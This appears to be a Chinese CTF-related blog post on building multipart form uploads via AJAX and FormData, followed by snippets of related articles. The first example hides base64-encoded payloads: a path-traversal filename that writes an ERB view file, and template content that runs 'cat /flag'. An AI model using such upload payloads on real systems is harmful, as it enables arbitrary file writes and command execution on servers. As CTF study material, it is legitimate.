1.用h5对象上传表单(图片)

    var formData = new FormData();

    formData.append("authenticity_token", '1212121212');

    formData.append("file[context]", "zxcvxzcvxzcv");

    var content = 'PCU9IGBjYXQgL2ZsYWcgYCAlPg==';   //这是文件内容的base64

    var blob = new Blob([content], { type: "image/png"});

    formData.append("file[myfile]", blob,"Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi");  //这里是文件名的base64

    formData.append("commit", 'submit');

    var request = new XMLHttpRequest();

    request.open("POST", "https://xz.aliyun.com/t/3245");

    request.send(formData);

请求体

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="authenticity_token"

1212121212

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="file[context]"

zxcvxzcvxzcv

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="file[myfile]"; filename="Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi"

Content-Type: image/png

PCU9IGBjYXQgL2ZsYWcgYCAlPg==

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="commit"

submit

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2--

1.用h5对象上传表单(txt)

    var formData = new FormData();

    var content = 'testestestes';   //这是文件内容的base64

    var blob = new Blob([content], { type: "text/plain"});

    formData.append("file[myfile]", blob,"haha.txt");  //这里是文件名的base64

    formData.append("commit", 'submit');

    var request = new XMLHttpRequest();

    request.open("POST", "https://xz.aliyun.com/t/3245");

    request.send(formData);

请求体

------WebKitFormBoundaryFcFYtbPnXsiq8yjI

Content-Disposition: form-data; name="file[myfile]"; filename="haha.txt"

Content-Type: text/plain

testestestes

------WebKitFormBoundaryFcFYtbPnXsiq8yjI

Content-Disposition: form-data; name="commit"

submit

------WebKitFormBoundaryFcFYtbPnXsiq8yjI--

2.使用原生js上传表单数据

通过余弦这个网站辅助生成表单

xhr = function(){

  /*AJAX*/

  var request = false;

  if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

  } else if(window.ActiveXObject) {

    try {

      request = new window.ActiveXObject('Microsoft.XMLHTTP');

    } catch(e) {}

  }

  return request;

}();

request = function(method,src,argv,content_type){

  xhr.open(method,src,false);

  if(method=='POST')xhr.setRequestHeader('Content-Type',content_type);

  xhr.send(argv);

  return xhr.responseText;

}

attack_a = function(){

  var src = "https://xz.aliyun.com";

  var authenticity_token = "1212121212";

  var file = "zxcvxzcvxzcv";

  var argv_0 = "\r\n";

  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"authenticity_token\"\r\n\r\n";

  argv_0 += (authenticity_token+"\r\n");

  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n";

  argv_0 += (file+"\r\n");

  argv_0 += "---------------------7964f8dddeb95fc5--\r\n";

  request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5");

}

请求体:

---------------------7964f8dddeb95fc5

Content-Disposition: form-data; name="authenticity_token"

1212121212

---------------------7964f8dddeb95fc5

Content-Disposition: form-data; name="file"

zxcvxzcvxzcv

---------------------7964f8dddeb95fc5--

HCTF share的详解ajax构造表单:

https://xz.aliyun.com/t/3258   xss上传表单

http://sec2hack.com/ctf/sctf2018-web-writeup.html xss获取源码

https://xz.aliyun.com/t/2469#toc-1巅峰极客wp,xss获取图片

ajax上传表单的俩种方式的更多相关文章

  1. 使用ajax上传表单(带文件)

    在使用form表单的时候上传文件+表单,会使得页面跳转,而在某些时候不希望跳转,只变化页面中的局部信息 通过查找资料,可以使用FormData进行ajax操作. FormData介绍:XMLHttpR ...

  2. 使用AJAX异步提交表单的几种方式

    方式一 手工收集所有的用户输入,封装为大的“k1=v1&k2=v2…”键值对形式,使用$.post(url, data,fn)把数据提交给服务器 $.ajax({ type:'post', u ...

  3. 【Flask】 结合wtforms的文件上传表单

    表单中的文件上传 基本的表单渲染,表单类设置等等就不多说了,参看另一个文章即可.但是那篇文章里没有提到对于FileField,也就是上传文件的表单字段是如何处理,后端又是如何实现接受上传过来的文件的. ...

  4. 上传漏洞科普[1]-文件上传表单是Web安全主要威胁

    为了让最终用户将文件上传到您的网站,就像是给危及您的服务器的恶意用户打开了另一扇门.即便如此,在今天的现代互联网的Web应用程序,它是一种 常见的要求,因为它有助于提高您的业务效率.在Facebook ...

  5. bootstrap上传表单的时候上传的数据默认是0 一定要小心

    bootstrap上传表单的时候上传的数据默认是0 一定要小心

  6. JavaScript表单提交四种方式

    总结JavaScript表单提交四种方式 <!DOCTYPE html> <html> <head> <title>JavaScript表单提交四种方式 ...

  7. Ajax提交Form表单的一种方法

    待提交的表单 <form id="updatePublicKey" enctype="multipart/form-data"> <div c ...

  8. C# MVC提交表单的四种方式(转)

    Mvc 提交表单的4种方法全程详解(转) 一,MVC  HtmlHelper方法 Html.BeginForm(actionName,controllerName,method,htmlAttribu ...

  9. 【总结-前台发送后台接收表单】MVC提交表单的四种方式

    https://www.cnblogs.com/chenwolong/p/Form.html#commentform 后台控制器接收前台表单参数三种方法: 一.普通参数 HTML标签name 和参数名 ...

随机推荐

  1. 浏览器获取正确的scrollTop值

    window.pageYOffset 被所有浏览器支持除了 IE 6, IE 7, IE 8, 不关doctype的事, 注IE9 开始支持此属性. window.scrollY 被Firefox, ...

  2. Java - 使可访问性最小化

    模块设计是否良好,有个重要的因素在于,相对外部模块是否隐藏内部数据以及实现细节. 设计良好的模块会隐藏实现细节,并将API与其实现隔离开来. 模块之间通过API进行通信,对于内部工作情况互不可见. 即 ...

  3. 【我整理的java开源项目】

    摘要: 1. 整理出一些使用比较广或者个人觉得比较好的java开源项目和资料供参考. 2. 如果你觉得好但是我没有列出的开源项目请告诉我,方便我添加到列表里. 3. 如果你发现信息描述有误请联系我,我 ...

  4. 认识Groovy

    什么是groovy: Groovy 是 JVM 的一个替代语言 —替代 是指可以用 Groovy 在 Java 平台上进行 Java 编程,使用方式基本与使用 Java 代码的方式相同. 在编写新应用 ...

  5. lumen配置日志daily模式

    默认的日志保存模式是single 也就是单文件模式 要想改成每日的daily模式可以在bootstrap/app.php下添加: /* * 配置日志文件为每日 */ $app->configur ...

  6. C++ STL:lower_bound与upper_bound实现

    lower_bound lower_bound(begin, end, target)用来查找一个已排序的序列中[begin, end)第一个大于等于target的元素index.数组A如下: val ...

  7. javascript之url转义escape()、encodeURI()和decodeURI(),ifram父子传参参数有中文时出现乱码

    ifram父子传参参数有中文时出现乱码,可先在父级页面用encodeURI转义,在到子页面用进行decodeURI()解码 我们可以知道:escape()除了 ASCII 字母.数字和特定的符号外,对 ...

  8. DOM基础代码练习(一)

    上一篇介绍了一下DOM的一些基础的知识,这里我整理了一些有关上一篇知识点的一些封装函数. 1.遍历元素节点 function retChild(node) { var child = node.chi ...

  9. 微服务架构之spring cloud 介绍

    在当前的软件开发行业中,尤其是互联网,微服务是非常炽热的一个词语,市面上已经有一些成型的微服务框架来帮助开发者简化开发工作量,但spring cloud 绝对占有一席之地,不管你是否为java开发,大 ...

  10. QT开发(一)Vs2013集成 QT5.3.1

    原文:http://www.cnblogs.com/aoldman/p/3860837.html 很久不写随笔了,真是越来越懒.最近公司要做一款产品,想使用QT不用WPF lol,让苦逼的.net的我 ...